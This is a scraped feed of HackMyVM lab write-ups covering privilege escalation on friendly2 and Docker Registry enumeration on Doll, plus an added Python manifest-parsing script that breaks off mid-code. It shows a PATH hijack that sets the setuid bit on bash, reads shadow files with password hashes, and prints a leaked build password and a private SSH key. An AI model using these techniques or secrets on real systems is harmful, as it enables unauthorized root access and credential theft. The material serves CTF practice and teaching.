-rwxr-xr-x 1 root root 1234376 Mar 27  2022 /bin/bash
gh0st@friendly2:/tmp$ sudo PATH=$PWD:$PATH /opt/security.sh
Enter the string to encode:
aaassss
The string cannot contain special characters.
gh0st@friendly2:/tmp$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 27  2022 /bin/bash
gh0st@friendly2:/tmp$ bash -p
bash-5.1# id
uid=1001(gh0st) gid=1001(gh0st) euid=0(root) groups=1001(gh0st)
bash-5.1# cat /root/
.bash_history  .bashrc        interfaces.sh  .local/        .profile       root.txt     
bash-5.1# cat /root/root.txt 
Not yet! Try to find root.txt.


Hint: ...
bash-5.1# find / -name '...' 2&gt;/dev/null
/...
bash-5.1# cd /.../
bash-5.1# ls -al
total 12
d-wx------  2 root root 4096 Apr 29  2023 .
drwxr-xr-x 19 root root 4096 Apr 27  2023 ..
-r--------  1 root root  100 Apr 29  2023 ebbg.txt
bash-5.1# cat ebbg.txt 
It's codified, look the cipher:

98199n723q0s44s6rs39r33685q8pnoq



Hint: numbers are not codified

```

![Image](https://github.com/user-attachments/assets/f1d96202-91e2-4915-adb2-fd428994419b)</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_friendly2.html</guid><pubDate>Thu, 20 Mar 2025 08:07:44 +0000</pubDate></item><item><title>hmv_flossy</title><link>https://7r1UMPH.github.io/post/hmv_flossy.html</link><description># hmv_flossy

# 0. Overview

**Target**: [hackmyvm - flossy](https://hackmyvm.eu/machines/machine.php?vm=flossy)
**Difficulty**: Yellow
**Target IP**: 192.168.205.138
**Local IP**: 192.168.205.141

# 1. Scanning

Start with `nmap`

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS --min-rate 10000 -p- -Pn 192.168.205.138
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-17 16:18 CST
Nmap scan report for 192.168.205.138
Host is up (0.00026s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:61:56:42 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

```

Look at **port 80** first; **port 22** is the fallback.

# 2. Reconnaissance

![Image](https://github.com/user-attachments/assets/b9a4753b-3614-43d8-adff-220881ce04cd)

A query page that takes a numeric value; valid IDs are **1-99**, and higher values just repeat earlier data.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_flossy.html</guid><pubDate>Thu, 20 Mar 2025 08:06:41 +0000</pubDate></item><item><title>hmv_espo</title><link>https://7r1UMPH.github.io/post/hmv_espo.html</link><description># hmv_espo

# 0. Overview

**Target**: [hackmyvm - espo](https://hackmyvm.eu/machines/machine.php?vm=espo)
**Difficulty**: Yellow
**Target IP**: 192.168.205.236
**Local IP**: 192.168.205.141

---

# 1. Scanning

Start with `nmap`

```bash
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS -p- -Pn -n -T4 192.168.205.236
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-08 13:19 CST
Nmap scan report for 192.168.205.236
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:9F:01:54 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds                                                            
```

---

# 2. Reconnaissance

![image](https://github.com/user-attachments/assets/ba54a62f-4f78-4f4d-89e2-686f549e1ed3)

It's a login form; let's search for known vulnerabilities.

```bash
┌──(kali㉿kali)-[~/test]
└─$ whatweb http://192.168.205.236                                     
http://192.168.205.236 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx], IP[192.168.205.236], PHP[8.2.7], PoweredBy[EspoCRM], Script[text/javascript], Title[EspoCRM], UncommonHeaders[x-content-type-options,content-security-policy], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/8.2.7], nginx
                                                                                                                                    
┌──(kali㉿kali)-[~/test]
└─$ searchsploit EspoCRM
---------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                      |  Path
---------------------------------------------------------------------------------------------------- ---------------------------------
EspoCRM 5.8.5 - Privilege Escalation                                                                | multiple/webapps/48376.txt
---------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                 
```

Only a privilege escalation exploit, but we don't have a user account yet.</description><guid isPermaLink="true">https://7r1UMPH.github.io/post/hmv_espo.html</guid><pubDate>Thu, 20 Mar 2025 08:05:38 +0000</pubDate></item><item><title>hmv_Doll</title><link>https://7r1UMPH.github.io/post/hmv_Doll.html</link><description># hmv_Doll

# 0. Chatter

![image](assets/image-20250129201949-6vewhf4.png)

**Target:** https://hackmyvm.eu/machines/machine.php?vm=Doll

**Target IP:** 192.168.72.129

**Kali IP:** 192.168.72.128

It's the second day of the Lunar New Year and I have a little free time, so here is a fresh writeup.

# 1. Scanning

Start scanning with `nmap`

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -sS -Pn -n -p- --min-rate 10000 192.168.72.129
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-29 20:16 EST
Nmap scan report for 192.168.72.129
Host is up (0.00020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
1007/tcp open  unknown
MAC Address: 08:00:27:F7:F4:53 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.19 seconds
                                                                  
```

Port `1007` is an unknown service, so we scan it in more detail

```
┌──(kali㉿kali)-[~/test]
└─$ nmap -sT -sV -Pn -n -p1007 192.168.72.129        
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-29 20:17 EST
Nmap scan report for 192.168.72.129
Host is up (0.00039s latency).

PORT     STATE SERVICE VERSION
1007/tcp open  http    Docker Registry (API: 2.0)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.26 seconds

```

No idea what this is; we'll look it up in a moment.

# 2. Reconnaissance

On **HackTricks** we find the article [5000 - Pentesting Docker Registry](https://book.hacktricks.wiki/zh/network-services-pentesting/5000-pentesting-docker-registry.html)

![image](assets/image-20250129202845-u4dct3k.png)

```
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.72.129:1007/v2/_catalog
{"repositories":["dolly"]}
                              
```

Keep digging

```
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.72.129:1007/v2/dolly/tags/list
{"name":"dolly","tags":["latest"]}
                                                                                                                                     
┌──(kali㉿kali)-[~/test]
└─$ curl http://192.168.72.129:1007/v2/dolly/manifests/latest
{
   "schemaVersion": 1,
   "name": "dolly",
   "tag": "latest",
   "architecture": "amd64",
   "fsLayers": [
      {
         "blobSum": "sha256:5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017"
      },
      {
         "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
      },
      {
         "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
      },
      {
         "blobSum": "sha256:f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09"
      }
   ],
   "history": [
      {
         "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"10ddd4608cdf\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"Image\":\"doll\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"10ddd4608cdfd81cd95111ecfa37499635f430b614fa326a6526eef17a215f06\",\"container_config\":{\"Hostname\":\"10ddd4608cdf\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"/bin/sh\"],\"Image\":\"doll\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2023-04-25T08:58:11.460540528Z\",\"docker_version\":\"23.0.4\",\"id\":\"89cefe32583c18fc5d6e6a5ffc138147094daac30a593800fe5b6615f2d34fd6\",\"os\":\"linux\",\"parent\":\"1430f49318669ee82715886522a2f56cd3727cbb7cb93a4a753512e2ca964a15\"}"
      },
      {
         "v1Compatibility": "{\"id\":\"1430f49318669ee82715886522a2f56cd3727cbb7cb93a4a753512e2ca964a15\",\"parent\":\"638e8754ced32813bcceecce2d2447a00c23f68c21ff2d7d125e40f1e65f1a89\",\"comment\":\"buildkit.dockerfile.v0\",\"created\":\"2023-03-29T18:19:24.45578926Z\",\"container_config\":{\"Cmd\":[\"ARG passwd=devilcollectsit\"]},\"throwaway\":true}"
      },
      {
         "v1Compatibility": "{\"id\":\"638e8754ced32813bcceecce2d2447a00c23f68c21ff2d7d125e40f1e65f1a89\",\"parent\":\"cf9a548b5a7df66eda1f76a6249fa47037665ebdcef5a98e7552149a0afb7e77\",\"created\":\"2023-03-29T18:19:24.45578926Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop)  CMD [\\\"/bin/sh\\\"]\"]},\"throwaway\":true}"
      },
      {
         "v1Compatibility": "{\"id\":\"cf9a548b5a7df66eda1f76a6249fa47037665ebdcef5a98e7552149a0afb7e77\",\"created\":\"2023-03-29T18:19:24.348438709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:9a4f77dfaba7fd2aa78186e4ef0e7486ad55101cefc1fabbc1b385601bb38920 in / \"]}}"
      }
   ],
   "signatures": [
      {
         "header": {
            "jwk": {
               "crv": "P-256",
               "kid": "X7W5:IVTA:CKTP:A6JJ:IMVJ:FOTQ:OO4M:CB4C:6JYB:PX6R:DQ6C:JPGS",
               "kty": "EC",
               "x": "m6jL0NHxYkVUo0-ID-HLzT0Y3OqOeOBvekpF98kC-4c",
               "y": "WlToBayTJ8f4zcry3wiq1fMvedgRkuwE7Oycza83_YA"
            },
            "alg": "ES256"
         },
         "signature": "n75fkjkUhAvtqrT2JfMVuBUtIUgiZ0ZhgYmM4m9kqOHprKnq7YrMyNKYYTntkxDmN2uW2w_3o36LvmRW7KzyOg",
         "protected": "eyJmb3JtYXRMZW5ndGgiOjI4MjksImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyNS0wMS0zMFQwMToyOTo0NVoifQ"
      }
   ]
}

┌──(kali㉿kali)-[~/test]
└─$ mkdir tmp     
                                                                                                                                     
┌──(kali㉿kali)-[~/test]
└─$ cd tmp 
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp]
└─$ curl http://192.168.72.129:1007/v2/dolly/blobs/sha256:5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017 -o blob1.tar
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  3707  100  3707    0     0   971k      0 --:--:-- --:--:-- --:--:-- 1206k
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp]
└─$ tar -xf blob1.tar
                         
┌──(kali㉿kali)-[~/test/tmp]
└─$ ls -la
total 24
drwxrwxr-x 5 kali kali 4096 Jan 29 20:32 .
drwxrwxr-x 4 kali kali 4096 Jan 29 20:32 ..
-rw-rw-r-- 1 kali kali 3707 Jan 29 20:32 blob1.tar
drwxr-xr-x 2 kali kali 4096 Apr 25  2023 etc
drwxr-xr-x 3 kali kali 4096 Apr 25  2023 home
drwx------ 2 kali kali 4096 Apr 25  2023 root
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp]
└─$ cd etc 
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp/etc]
└─$ ls -al
total 32
drwxr-xr-x 2 kali kali 4096 Apr 25  2023 .
drwxrwxr-x 5 kali kali 4096 Jan 29 20:32 ..
-rw-r--r-- 1 kali kali  710 Apr 25  2023 group
-rw-r--r-- 1 kali kali  697 Nov  4  2022 group-
-rw-r--r-- 1 kali kali 1223 Apr 25  2023 passwd
-rw-r--r-- 1 kali kali 1223 Apr 25  2023 passwd-
-rw-r----- 1 kali kali  553 Apr 25  2023 shadow
-rw-r----- 1 kali kali  448 Apr 25  2023 shadow-
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp/etc]
└─$ cat *   
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root,adm
lp:x:7:lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
floppy:x:11:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:man
cron:x:16:cron
console:x:17:
audio:x:18:
cdrom:x:19:
dialout:x:20:root
ftp:x:21:
sshd:x:22:
input:x:23:
at:x:25:at
tape:x:26:root
video:x:27:root
netdev:x:28:
readproc:x:30:
squid:x:31:squid
xfs:x:33:xfs
kvm:x:34:kvm
games:x:35:
shadow:x:42:
cdrw:x:80:
www-data:x:82:
usb:x:85:
vpopmail:x:89:
users:x:100:games
ntp:x:123:
nofiles:x:200:
smmsp:x:209:smmsp
locate:x:245:
abuild:x:300:
utmp:x:406:
ping:x:999:
nogroup:x:65533:
nobody:x:65534:
bela:x:1000:
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root,adm
lp:x:7:lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
floppy:x:11:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:man
cron:x:16:cron
console:x:17:
audio:x:18:
cdrom:x:19:
dialout:x:20:root
ftp:x:21:
sshd:x:22:
input:x:23:
at:x:25:at
tape:x:26:root
video:x:27:root
netdev:x:28:
readproc:x:30:
squid:x:31:squid
xfs:x:33:xfs
kvm:x:34:kvm
games:x:35:
shadow:x:42:
cdrw:x:80:
www-data:x:82:
usb:x:85:
vpopmail:x:89:
users:x:100:games
ntp:x:123:
nofiles:x:200:
smmsp:x:209:smmsp
locate:x:245:
abuild:x:300:
utmp:x:406:
ping:x:999:
nogroup:x:65533:
nobody:x:65534:
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
bela:x:1000:1000:Linux User,,,:/home/bela:/bin/ash
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
bela:x:1000:1000:Linux User,,,:/home/bela:/bin/ash
root:*::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
bela:$6$azVVFjn.mkvh.lhA$yAXPBGOZDXRdDBmn3obtzhUzxwfDD7u3YIcixohpKzTGpJS0Oeu7UVoguhmwg4DHNM8K5z7Tn93BBaDadM/A5.:19472:0:99999:7:::
root:*::0:::::
bin:!::0:::::
daemon:!::0:::::
adm:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
operator:!::0:::::
man:!::0:::::
postmaster:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
at:!::0:::::
squid:!::0:::::
xfs:!::0:::::
games:!::0:::::
cyrus:!::0:::::
vpopmail:!::0:::::
ntp:!::0:::::
smmsp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
bela:!:19472:0:99999:7:::
                                 
┌──(kali㉿kali)-[~/test/tmp/etc]
└─$ cd ..                                
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp]
└─$ ls la 
ls: cannot access 'la': No such file or directory
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp]
└─$ ls -la
total 24
drwxrwxr-x 5 kali kali 4096 Jan 29 20:32 .
drwxrwxr-x 4 kali kali 4096 Jan 29 20:32 ..
-rw-rw-r-- 1 kali kali 3707 Jan 29 20:32 blob1.tar
drwxr-xr-x 2 kali kali 4096 Apr 25  2023 etc
drwxr-xr-x 3 kali kali 4096 Apr 25  2023 home
drwx------ 2 kali kali 4096 Apr 25  2023 root
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp]
└─$ cd home 
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp/home]
└─$ ls -al
total 12
drwxr-xr-x 3 kali kali 4096 Apr 25  2023 .
drwxrwxr-x 5 kali kali 4096 Jan 29 20:32 ..
drwxr-xr-x 3 kali kali 4096 Apr 25  2023 bela
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp/home]
└─$ cd bela 
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp/home/bela]
└─$ l -al 
total 16
drwxr-xr-x 3 kali kali 4096 Apr 25  2023 ./
drwxr-xr-x 3 kali kali 4096 Apr 25  2023 ../
-rw------- 1 kali kali   57 Apr 25  2023 .ash_history
drwxr-xr-x 2 kali kali 4096 Apr 25  2023 .ssh/
-rwxr-xr-x 1 kali kali    0 Dec 31  1969 .wh..wh..opq*
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp/home/bela]
└─$ cat .ash_history                     
pwd
ls -la
mkdir .ssh
cd .ssh
nano id_rsa
vi id_rsa
exit
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp/home/bela]
└─$ cat .wh..wh..opq
                                                                                                                                     
┌──(kali㉿kali)-[~/test/tmp/home/bela]
└─$ cd .ssh       
                                                                                                                                     
┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh]
└─$ ls -al
total 12
drwxr-xr-x 2 kali kali 4096 Apr 25  2023 .
drwxr-xr-x 3 kali kali 4096 Apr 25  2023 ..
-rw-r--r-- 1 kali kali 2635 Apr 25  2023 id_rsa
                                                                                                                                     
┌──(kali㉿kali)-[~/…/tmp/home/bela/.ssh]
└─$ cat id_rsa    
-----BEGIN OPENSSH PRIVATE KEY-----
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
VtVwCw==
-----END OPENSSH PRIVATE KEY-----
                                             
```
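
Everything the recon above did against port 1007 (`_catalog`, `tags/list`, `manifests`, `blobs`) is the unauthenticated Registry HTTP API v2, and the schema-1 manifest it returned carries the whole build history in `history[].v1Compatibility`: one of those entries is `ARG passwd=devilcollectsit`, readable by anyone who can reach the registry, before a single layer is downloaded. The following is an added example, not code from this writeup or from the Doll image. It parses a constructed copy of that manifest (trimmed to the fields it uses), lists the distinct layer blobs worth pulling, decodes the build history, and flags build args or environment variables whose names look credential-like. `fetch_manifest` is the only part that touches the network and the sample never calls it; the secret-name pattern is this example's own heuristic.

```python
import json
import re
import urllib.request

# Schema-1 manifests pad metadata-only history entries with this well-known
# empty-layer digest; it carries no files, so there is nothing to download.
EMPTY_LAYER = "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"

# Heuristic (this example's own): build-time names that deserve a second look.
SENSITIVE = re.compile(r"pass|pwd|secret|token|key|cred", re.IGNORECASE)

# 'ARG name=value' / 'ENV name=value' as they appear in container_config.Cmd.
ARG_OR_ENV = re.compile(r'\b(ARG|ENV)\s+([A-Za-z_][A-Za-z0-9_]*)=([^\s"]+)')

# CONSTRUCTED sample: the dolly:latest manifest from above, trimmed to the
# fields used here (signatures dropped, config blocks shortened).
SAMPLE_MANIFEST = {
    "schemaVersion": 1, "name": "dolly", "tag": "latest",
    "fsLayers": [
        {"blobSum": "sha256:5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017"},
        {"blobSum": EMPTY_LAYER},
        {"blobSum": EMPTY_LAYER},
        {"blobSum": "sha256:f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09"},
    ],
    "history": [{"v1Compatibility": json.dumps(v1)} for v1 in (
        {"id": "89cefe32583c18fc5d6e6a5ffc138147094daac30a593800fe5b6615f2d34fd6",
         "created": "2023-04-25T08:58:11.460540528Z",
         "config": {"Env": ["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"],
                    "Cmd": ["/bin/sh"]},
         "container_config": {"Cmd": ["/bin/sh"]}},
        {"id": "1430f49318669ee82715886522a2f56cd3727cbb7cb93a4a753512e2ca964a15",
         "created": "2023-03-29T18:19:24.45578926Z",
         "container_config": {"Cmd": ["ARG passwd=devilcollectsit"]}, "throwaway": True},
        {"id": "638e8754ced32813bcceecce2d2447a00c23f68c21ff2d7d125e40f1e65f1a89",
         "created": "2023-03-29T18:19:24.45578926Z",
         "container_config": {"Cmd": ["/bin/sh -c #(nop)  CMD [\"/bin/sh\"]"]}, "throwaway": True},
        {"id": "cf9a548b5a7df66eda1f76a6249fa47037665ebdcef5a98e7552149a0afb7e77",
         "created": "2023-03-29T18:19:24.348438709Z",
         "container_config": {"Cmd": ["/bin/sh -c #(nop) ADD file:9a4f77dfaba7fd2aa78186e4ef0e7486ad55101cefc1fabbc1b385601bb38920 in / "]}},
    )],
}


def fetch_manifest(registry, repo, tag="latest"):
    """GET /v2/{repo}/manifests/{tag} from an unauthenticated registry (network;
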